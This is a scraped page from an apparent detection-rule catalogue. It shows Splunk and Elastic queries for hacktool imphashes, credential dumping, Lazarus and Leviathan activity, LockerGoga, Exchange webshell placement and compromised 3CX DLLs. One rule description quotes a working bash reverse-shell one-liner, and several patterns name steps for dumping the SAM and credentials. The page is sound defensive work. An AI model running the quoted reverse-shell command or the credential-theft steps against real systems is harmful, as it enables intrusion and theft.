Tool
Splunk
12,781 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
◈
Detections
50 shown of 12,781HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
Show query
(Image:(*\\WCE.exe OR *\\WCE64.exe)) OR (Hashes:(*IMPHASH\=136F0A8572C058A96436C82E541E4C41* OR *IMPHASH\=589657C64DDE88533186C39F82FA1F50* OR *IMPHASH\=6BFE09EFCB4FFDE061EBDBAFC4DB84CF* OR *IMPHASH\=7D490037BF450877E6D0287BDCFF8D2E* OR *IMPHASH\=8AB93B061287C79F3088C5BC7E7D97ED* OR *IMPHASH\=A53A02B997935FD8EEDCB5F7ABAB9B9F* OR *IMPHASH\=BA434A7A729EEC20E136CA4C32D6C740* OR *IMPHASH\=BD1D1547DA13C0FCB6C15E86217D5EB8* OR *IMPHASH\=E96A73C7BF33A464C510EDE582318BF2*))
Hacktool Execution - Imphash
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
Show query
any where Hashes like~ ("*IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932*", "*IMPHASH=3A19059BD7688CB88E70005F18EFC439*", "*IMPHASH=bf6223a49e45d99094406777eb6004ba*", "*IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1*", "*IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC*", "*IMPHASH=F9A28C458284584A93B14216308D31BD*", "*IMPHASH=6118619783FC175BC7EBECFF0769B46E*", "*IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA*", "*IMPHASH=563233BFA169ACC7892451F71AD5850A*", "*IMPHASH=87575CB7A0E0700EB37F2E3668671A08*", "*IMPHASH=13F08707F759AF6003837A150A371BA1*", "*IMPHASH=1781F06048A7E58B323F0B9259BE798B*", "*IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5*", "*IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D*", "*IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2*", "*IMPHASH=713C29B396B907ED71A72482759ED757*", "*IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F*", "*IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E*", "*IMPHASH=8B114550386E31895DFAB371E741123D*", "*IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793*", "*IMPHASH=9D68781980370E00E0BD939EE5E6C141*", "*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*", "*IMPHASH=CB567F9498452721D77A451374955F5F*", "*IMPHASH=730073214094CD328547BF1F72289752*", "*IMPHASH=17B461A082950FC6332228572138B80C*", "*IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9*", "*IMPHASH=819B19D53CA6736448F9325A85736792*", "*IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E*", "*IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74*", "*IMPHASH=0588081AB0E63BA785938467E1B10CCA*", "*IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C*", "*IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29*", "*IMPHASH=4DA924CF622D039D58BCE71CDF05D242*", "*IMPHASH=E7A3A5C377E2D29324093377D7DB1C66*", "*IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF*", "*IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE*", "*IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4*", "*IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338*", "*IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E*", "*IMPHASH=E6F9D5152DA699934B30DAAB206471F6*", "*IMPHASH=3AD59991CCF1D67339B319B15A41B35D*", "*IMPHASH=FFDD59E0318B85A3E480874D9796D872*", "*IMPHASH=0CF479628D7CC1EA25EC7998A92F5051*", "*IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51*", "*IMPHASH=D6D0F80386E1380D05CB78E871BC72B1*", "*IMPHASH=38D9E015591BBFD4929E0D0F47FA0055*", "*IMPHASH=0E2216679CA6E1094D63322E3412D650*", "*IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB*", "*IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798*", "*IMPHASH=11083E75553BAAE21DC89CE8F9A195E4*", "*IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80*", "*IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F*", "*IMPHASH=767637C23BB42CD5D7397CF58B0BE688*", "*IMPHASH=14C4E4C72BA075E9069EE67F39188AD8*", "*IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC*", "*IMPHASH=7D010C6BB6A3726F327F7E239166D127*", "*IMPHASH=89159BA4DD04E4CE5559F132A9964EB3*", "*IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F*", "*IMPHASH=5834ED4291BDEB928270428EBBAF7604*", "*IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38*", "*IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894*", "*IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74*", "*IMPHASH=3DE09703C8E79ED2CA3F01074719906B*", "*IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F*", "*IMPHASH=E96A73C7BF33A464C510EDE582318BF2*", "*IMPHASH=32089B8851BBF8BC2D014E9F37288C83*", "*IMPHASH=09D278F9DE118EF09163C6140255C690*", "*IMPHASH=03866661686829d806989e2fc5a72606*", "*IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d*", "*IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE*", "*IMPHASH=19584675D94829987952432E018D5056*", "*IMPHASH=330768A4F172E10ACB6287B87289D83B*", "*IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313*", "*IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC*", "*IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28*", "*IMPHASH=96DF3A3731912449521F6F8D183279B1*", "*IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46*", "*IMPHASH=51791678F351C03A0EB4E2A7B05C6E17*", "*IMPHASH=25CE42B079282632708FC846129E98A5*", "*IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20*", "*IMPHASH=59223B5F52D8799D38E0754855CBDF42*", "*IMPHASH=81E75D8F1D276C156653D3D8813E4A43*", "*IMPHASH=17244E8B6B8227E57FE709CCAD421420*", "*IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4*", "*IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C*", "*IMPHASH=40445337761D80CF465136FAFB1F63E6*", "*IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6*", "*IMPHASH=B50199E952C875241B9CE06C971CE3C1*")Hacktool Execution - Imphash
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
Show query
from * metadata _id, _index, _version | where Hashes like "*IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932*" or Hashes like "*IMPHASH=3A19059BD7688CB88E70005F18EFC439*" or Hashes like "*IMPHASH=bf6223a49e45d99094406777eb6004ba*" or Hashes like "*IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1*" or Hashes like "*IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC*" or Hashes like "*IMPHASH=F9A28C458284584A93B14216308D31BD*" or Hashes like "*IMPHASH=6118619783FC175BC7EBECFF0769B46E*" or Hashes like "*IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA*" or Hashes like "*IMPHASH=563233BFA169ACC7892451F71AD5850A*" or Hashes like "*IMPHASH=87575CB7A0E0700EB37F2E3668671A08*" or Hashes like "*IMPHASH=13F08707F759AF6003837A150A371BA1*" or Hashes like "*IMPHASH=1781F06048A7E58B323F0B9259BE798B*" or Hashes like "*IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5*" or Hashes like "*IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D*" or Hashes like "*IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2*" or Hashes like "*IMPHASH=713C29B396B907ED71A72482759ED757*" or Hashes like "*IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F*" or Hashes like "*IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E*" or Hashes like "*IMPHASH=8B114550386E31895DFAB371E741123D*" or Hashes like "*IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793*" or Hashes like "*IMPHASH=9D68781980370E00E0BD939EE5E6C141*" or Hashes like "*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" or Hashes like "*IMPHASH=CB567F9498452721D77A451374955F5F*" or Hashes like "*IMPHASH=730073214094CD328547BF1F72289752*" or Hashes like "*IMPHASH=17B461A082950FC6332228572138B80C*" or Hashes like "*IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9*" or Hashes like "*IMPHASH=819B19D53CA6736448F9325A85736792*" or Hashes like "*IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E*" or Hashes like "*IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74*" or Hashes like "*IMPHASH=0588081AB0E63BA785938467E1B10CCA*" or Hashes like "*IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C*" or Hashes like "*IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29*" or Hashes like "*IMPHASH=4DA924CF622D039D58BCE71CDF05D242*" or Hashes like "*IMPHASH=E7A3A5C377E2D29324093377D7DB1C66*" or Hashes like "*IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF*" or Hashes like "*IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE*" or Hashes like "*IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4*" or Hashes like "*IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338*" or Hashes like "*IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E*" or Hashes like "*IMPHASH=E6F9D5152DA699934B30DAAB206471F6*" or Hashes like "*IMPHASH=3AD59991CCF1D67339B319B15A41B35D*" or Hashes like "*IMPHASH=FFDD59E0318B85A3E480874D9796D872*" or Hashes like "*IMPHASH=0CF479628D7CC1EA25EC7998A92F5051*" or Hashes like "*IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51*" or Hashes like "*IMPHASH=D6D0F80386E1380D05CB78E871BC72B1*" or Hashes like "*IMPHASH=38D9E015591BBFD4929E0D0F47FA0055*" or Hashes like "*IMPHASH=0E2216679CA6E1094D63322E3412D650*" or Hashes like "*IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB*" or Hashes like "*IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798*" or Hashes like "*IMPHASH=11083E75553BAAE21DC89CE8F9A195E4*" or Hashes like "*IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80*" or Hashes like "*IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F*" or Hashes like "*IMPHASH=767637C23BB42CD5D7397CF58B0BE688*" or Hashes like "*IMPHASH=14C4E4C72BA075E9069EE67F39188AD8*" or Hashes like "*IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC*" or Hashes like "*IMPHASH=7D010C6BB6A3726F327F7E239166D127*" or Hashes like "*IMPHASH=89159BA4DD04E4CE5559F132A9964EB3*" or Hashes like "*IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F*" or Hashes like "*IMPHASH=5834ED4291BDEB928270428EBBAF7604*" or Hashes like "*IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38*" or Hashes like "*IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894*" or Hashes like "*IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74*" or Hashes like "*IMPHASH=3DE09703C8E79ED2CA3F01074719906B*" or Hashes like "*IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F*" or Hashes like "*IMPHASH=E96A73C7BF33A464C510EDE582318BF2*" or Hashes like "*IMPHASH=32089B8851BBF8BC2D014E9F37288C83*" or Hashes like "*IMPHASH=09D278F9DE118EF09163C6140255C690*" or Hashes like "*IMPHASH=03866661686829d806989e2fc5a72606*" or Hashes like "*IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d*" or Hashes like "*IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE*" or Hashes like "*IMPHASH=19584675D94829987952432E018D5056*" or Hashes like "*IMPHASH=330768A4F172E10ACB6287B87289D83B*" or Hashes like "*IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313*" or Hashes like "*IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC*" or Hashes like "*IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28*" or Hashes like "*IMPHASH=96DF3A3731912449521F6F8D183279B1*" or Hashes like "*IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46*" or Hashes like "*IMPHASH=51791678F351C03A0EB4E2A7B05C6E17*" or Hashes like "*IMPHASH=25CE42B079282632708FC846129E98A5*" or Hashes like "*IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20*" or Hashes like "*IMPHASH=59223B5F52D8799D38E0754855CBDF42*" or Hashes like "*IMPHASH=81E75D8F1D276C156653D3D8813E4A43*" or Hashes like "*IMPHASH=17244E8B6B8227E57FE709CCAD421420*" or Hashes like "*IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4*" or Hashes like "*IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C*" or Hashes like "*IMPHASH=40445337761D80CF465136FAFB1F63E6*" or Hashes like "*IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6*" or Hashes like "*IMPHASH=B50199E952C875241B9CE06C971CE3C1*"
Hacktool Execution - Imphash
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
Show query
Hashes:(*IMPHASH\=BCCA3C247B619DCD13C8CDFF5F123932* OR *IMPHASH\=3A19059BD7688CB88E70005F18EFC439* OR *IMPHASH\=bf6223a49e45d99094406777eb6004ba* OR *IMPHASH\=23867A89C2B8FC733BE6CF5EF902F2D1* OR *IMPHASH\=A37FF327F8D48E8A4D2F757E1B6E70BC* OR *IMPHASH\=F9A28C458284584A93B14216308D31BD* OR *IMPHASH\=6118619783FC175BC7EBECFF0769B46E* OR *IMPHASH\=959A83047E80AB68B368FDB3F4C6E4EA* OR *IMPHASH\=563233BFA169ACC7892451F71AD5850A* OR *IMPHASH\=87575CB7A0E0700EB37F2E3668671A08* OR *IMPHASH\=13F08707F759AF6003837A150A371BA1* OR *IMPHASH\=1781F06048A7E58B323F0B9259BE798B* OR *IMPHASH\=233F85F2D4BC9D6521A6CAAE11A1E7F5* OR *IMPHASH\=24AF2584CBF4D60BBE5C6D1B31B3BE6D* OR *IMPHASH\=632969DDF6DBF4E0F53424B75E4B91F2* OR *IMPHASH\=713C29B396B907ED71A72482759ED757* OR *IMPHASH\=749A7BB1F0B4C4455949C0B2BF7F9E9F* OR *IMPHASH\=8628B2608957A6B0C6330AC3DE28CE2E* OR *IMPHASH\=8B114550386E31895DFAB371E741123D* OR *IMPHASH\=94CB940A1A6B65BED4D5A8F849CE9793* OR *IMPHASH\=9D68781980370E00E0BD939EE5E6C141* OR *IMPHASH\=B18A1401FF8F444056D29450FBC0A6CE* OR *IMPHASH\=CB567F9498452721D77A451374955F5F* OR *IMPHASH\=730073214094CD328547BF1F72289752* OR *IMPHASH\=17B461A082950FC6332228572138B80C* OR *IMPHASH\=DC25EE78E2EF4D36FAA0BADF1E7461C9* OR *IMPHASH\=819B19D53CA6736448F9325A85736792* OR *IMPHASH\=829DA329CE140D873B4A8BDE2CBFAA7E* OR *IMPHASH\=C547F2E66061A8DFFB6F5A3FF63C0A74* OR *IMPHASH\=0588081AB0E63BA785938467E1B10CCA* OR *IMPHASH\=0D9EC08BAC6C07D9987DFD0F1506587C* OR *IMPHASH\=BC129092B71C89B4D4C8CDF8EA590B29* OR *IMPHASH\=4DA924CF622D039D58BCE71CDF05D242* OR *IMPHASH\=E7A3A5C377E2D29324093377D7DB1C66* OR *IMPHASH\=9A9DBEC5C62F0380B4FA5FD31DEFFEDF* OR *IMPHASH\=AF8A3976AD71E5D5FDFB67DDB8DADFCE* OR *IMPHASH\=0C477898BBF137BBD6F2A54E3B805FF4* OR *IMPHASH\=0CA9F02B537BCEA20D4EA5EB1A9FE338* OR *IMPHASH\=3AB3655E5A14D4EEFC547F4781BF7F9E* OR *IMPHASH\=E6F9D5152DA699934B30DAAB206471F6* OR *IMPHASH\=3AD59991CCF1D67339B319B15A41B35D* OR *IMPHASH\=FFDD59E0318B85A3E480874D9796D872* OR *IMPHASH\=0CF479628D7CC1EA25EC7998A92F5051* OR *IMPHASH\=07A2D4DCBD6CB2C6A45E6B101F0B6D51* OR *IMPHASH\=D6D0F80386E1380D05CB78E871BC72B1* OR *IMPHASH\=38D9E015591BBFD4929E0D0F47FA0055* OR *IMPHASH\=0E2216679CA6E1094D63322E3412D650* OR *IMPHASH\=ADA161BF41B8E5E9132858CB54CAB5FB* OR *IMPHASH\=2A1BC4913CD5ECB0434DF07CB675B798* OR *IMPHASH\=11083E75553BAAE21DC89CE8F9A195E4* OR *IMPHASH\=A23D29C9E566F2FA8FFBB79267F5DF80* OR *IMPHASH\=4A07F944A83E8A7C2525EFA35DD30E2F* OR *IMPHASH\=767637C23BB42CD5D7397CF58B0BE688* OR *IMPHASH\=14C4E4C72BA075E9069EE67F39188AD8* OR *IMPHASH\=3C782813D4AFCE07BBFC5A9772ACDBDC* OR *IMPHASH\=7D010C6BB6A3726F327F7E239166D127* OR *IMPHASH\=89159BA4DD04E4CE5559F132A9964EB3* OR *IMPHASH\=6F33F4A5FC42B8CEC7314947BD13F30F* OR *IMPHASH\=5834ED4291BDEB928270428EBBAF7604* OR *IMPHASH\=5A8A8A43F25485E7EE1B201EDCBC7A38* OR *IMPHASH\=DC7D30B90B2D8ABF664FBED2B1B59894* OR *IMPHASH\=41923EA1F824FE63EA5BEB84DB7A3E74* OR *IMPHASH\=3DE09703C8E79ED2CA3F01074719906B* OR *IMPHASH\=A53A02B997935FD8EEDCB5F7ABAB9B9F* OR *IMPHASH\=E96A73C7BF33A464C510EDE582318BF2* OR *IMPHASH\=32089B8851BBF8BC2D014E9F37288C83* OR *IMPHASH\=09D278F9DE118EF09163C6140255C690* OR *IMPHASH\=03866661686829d806989e2fc5a72606* OR *IMPHASH\=e57401fbdadcd4571ff385ab82bd5d6d* OR *IMPHASH\=84B763C45C0E4A3E7CA5548C710DB4EE* OR *IMPHASH\=19584675D94829987952432E018D5056* OR *IMPHASH\=330768A4F172E10ACB6287B87289D83B* OR *IMPHASH\=885C99CCFBE77D1CBFCB9C4E7C1A3313* OR *IMPHASH\=22A22BC9E4E0D2F189F1EA01748816AC* OR *IMPHASH\=7FA30E6BB7E8E8A69155636E50BF1B28* OR *IMPHASH\=96DF3A3731912449521F6F8D183279B1* OR *IMPHASH\=7E6CF3FF4576581271AC8A313B2AAB46* OR *IMPHASH\=51791678F351C03A0EB4E2A7B05C6E17* OR *IMPHASH\=25CE42B079282632708FC846129E98A5* OR *IMPHASH\=021BCCA20BA3381B11BDDE26B4E62F20* OR *IMPHASH\=59223B5F52D8799D38E0754855CBDF42* OR *IMPHASH\=81E75D8F1D276C156653D3D8813E4A43* OR *IMPHASH\=17244E8B6B8227E57FE709CCAD421420* OR *IMPHASH\=5B76DA3ACDEDC8A5CDF23A798B5936B4* OR *IMPHASH\=CB2B65BB77D995CC1C0E5DF1C860133C* OR *IMPHASH\=40445337761D80CF465136FAFB1F63E6* OR *IMPHASH\=8A790F401B29FA87BC1E56F7272B3AA6* OR *IMPHASH\=B50199E952C875241B9CE06C971CE3C1*)
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
Show query
any where Image:"*\\msiexec.exe" and TargetFilename:"C:\\Program Files (x86)\\Microsoft\\Edge\\Application*" and TargetFilename:"*\\elevation_service.exe"
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
Show query
from * metadata _id, _index, _version | where ends_with(Image, "\\msiexec.exe") and starts_with(TargetFilename, "C:\\Program Files (x86)\\Microsoft\\Edge\\Application") and ends_with(TargetFilename, "\\elevation_service.exe")
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
Show query
Image:*\\msiexec.exe AND TargetFilename:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application* AND TargetFilename:*\\elevation_service.exe
Elastic
Original
ESQL
critical
LLM-Based Attack Chain Triage by Host
This rule correlates multiple endpoint security alerts from the same host and uses an LLM to analyze command lines,
parent processes, file operations, DNS queries, registry modifications, module loads and MITRE ATT&CK tactics progression to
determine if they form a coherent attack chain. The LLM provides a verdict (TP/FP/SUSPICIOUS) with confidence score
and summary explanation, helping analysts to prioritize hosts exhibiting corroborated malicious behavior while
filtering out benign activity.
Elastic
Original
ESQL
critical
LLM-Based Compromised User Triage by User
This rule correlates multiple security alerts involving the same user across hosts and data sources, then uses an LLM to
analyze whether they indicate account compromise. The LLM evaluates alert patterns, MITRE tactics progression,
geographic anomalies, and multi-host activity to provide a verdict and confidence score, helping analysts prioritize
users exhibiting indicators of credential theft or unauthorized access.
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
Show query
any where (CommandLine like~ ("*reg.exe save hklm\\sam %temp%\\~reg_sam.save*", "*1q2w3e4r@#$@#$@#$*", "* -hp1q2w3e4 *", "*.dat data03 10000 -p *")) or (CommandLine:"*netstat -aon | find *" and CommandLine:"*ESTA*" and CommandLine:"* > %temp%\\~*") or (CommandLine:"*.255 10 C:\\ProgramData\\IBM\\*" and CommandLine:"*.DAT*") or ((CommandLine:"* /c *" and CommandLine:"* -p 0x*") and (CommandLine like~ ("*C:\\ProgramData\\*", "*C:\\RECYCLER\\*"))) or ((CommandLine:"*rundll32 *" and CommandLine:"*C:\\ProgramData\\*") and (CommandLine like~ ("*.bin,*", "*.tmp,*", "*.dat,*", "*.io,*", "*.ini,*", "*.db,*")))Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
Show query
from * metadata _id, _index, _version | where CommandLine like "*reg.exe save hklm\\sam %temp%\\~reg_sam.save*" or CommandLine like "*1q2w3e4r@#$@#$@#$*" or CommandLine like "* -hp1q2w3e4 *" or CommandLine like "*.dat data03 10000 -p *" or CommandLine like "*netstat -aon | find *" and CommandLine like "*ESTA*" and CommandLine like "* > %temp%\\~*" or CommandLine like "*.255 10 C:\\ProgramData\\IBM\\*" and CommandLine like "*.DAT*" or CommandLine like "* /c *" and CommandLine like "* -p 0x*" and (CommandLine like "*C:\\ProgramData\\*" or CommandLine like "*C:\\RECYCLER\\*") or CommandLine like "*rundll32 *" and CommandLine like "*C:\\ProgramData\\*" and (CommandLine like "*.bin,*" or CommandLine like "*.tmp,*" or CommandLine like "*.dat,*" or CommandLine like "*.io,*" or CommandLine like "*.ini,*" or CommandLine like "*.db,*")
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
Show query
(CommandLine:(*reg.exe\ save\ hklm\\sam\ %temp%\\\~reg_sam.save* OR *1q2w3e4r@#$@#$@#$* OR *\ \-hp1q2w3e4\ * OR *.dat\ data03\ 10000\ \-p\ *)) OR (CommandLine:*netstat\ \-aon\ \|\ find\ * AND CommandLine:*ESTA* AND CommandLine:*\ \>\ %temp%\\\~*) OR (CommandLine:*.255\ 10\ C\:\\ProgramData\\IBM\\* AND CommandLine:*.DAT*) OR ((CommandLine:*\ \/c\ * AND CommandLine:*\ \-p\ 0x*) AND (CommandLine:(*C\:\\ProgramData\\* OR *C\:\\RECYCLER\\*))) OR ((CommandLine:*rundll32\ * AND CommandLine:*C\:\\ProgramData\\*) AND (CommandLine:(*.bin,* OR *.tmp,* OR *.dat,* OR *.io,* OR *.ini,* OR *.db,*)))
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
Show query
any where TargetObject:"*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*"
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
Show query
from * metadata _id, _index, _version | where TargetObject like "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*"
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
Show query
TargetObject:*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd*
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Show query
any where Image:"*/bin/bash" and (not (DestinationIp like~ ("127.0.0.1", "0.0.0.0")))Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Show query
from * metadata _id, _index, _version | where ends_with(Image, "/bin/bash") and not (DestinationIp in ("127.0.0.1", "0.0.0.0"))Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Show query
Image:*\/bin\/bash AND (NOT (DestinationIp:(127.0.0.1 OR 0.0.0.0)))
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
Show query
any where CommandLine:"*-i SM-tgytutrc -s*"
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
Show query
from * metadata _id, _index, _version | where CommandLine like "*-i SM-tgytutrc -s*"
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
Show query
CommandLine:*\-i\ SM\-tgytutrc\ \-s*
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
Show query
any where (("New-MailboxExportRequest" and " -Mailbox ") and ("-FilePath \"\\\\" or ".aspx")) or ("New-ManagementRoleAssignment" and " -Role \"Mailbox Import Export\"" and " -User ")Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
Show query
((*New\-MailboxExportRequest* AND *\ \-Mailbox\ *) AND (*\-FilePath\ \"\\\\* OR *.aspx*)) OR (*New\-ManagementRoleAssignment* AND *\ \-Role\ \"Mailbox\ Import\ Export\"* AND *\ \-User\ *)
Elastic
Converted
EQL
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
Show query
any where Hashes like~ ("*SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896*", "*SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429*", "*MD5=74BC2D0B6680FAA1A5A76B27E5479CBC*", "*SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03*", "*SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E*", "*MD5=82187AD3F0C6C225E2FBA0C867280CC9*", "*SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952*", "*SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30*", "*MD5=11BC82A9BD8297BD0823BCE5D6202082*", "*SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423*", "*SHA1=3B3E778B647371262120A523EB873C20BB82BEAF*", "*MD5=7FAEA2B01796B80D180399040BB69835*")
Elastic
Converted
ES|QL
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
Show query
from * metadata _id, _index, _version | where Hashes like "*SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896*" or Hashes like "*SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429*" or Hashes like "*MD5=74BC2D0B6680FAA1A5A76B27E5479CBC*" or Hashes like "*SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03*" or Hashes like "*SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E*" or Hashes like "*MD5=82187AD3F0C6C225E2FBA0C867280CC9*" or Hashes like "*SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952*" or Hashes like "*SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30*" or Hashes like "*MD5=11BC82A9BD8297BD0823BCE5D6202082*" or Hashes like "*SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423*" or Hashes like "*SHA1=3B3E778B647371262120A523EB873C20BB82BEAF*" or Hashes like "*MD5=7FAEA2B01796B80D180399040BB69835*"
Elastic
Converted
Lucene
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
Show query
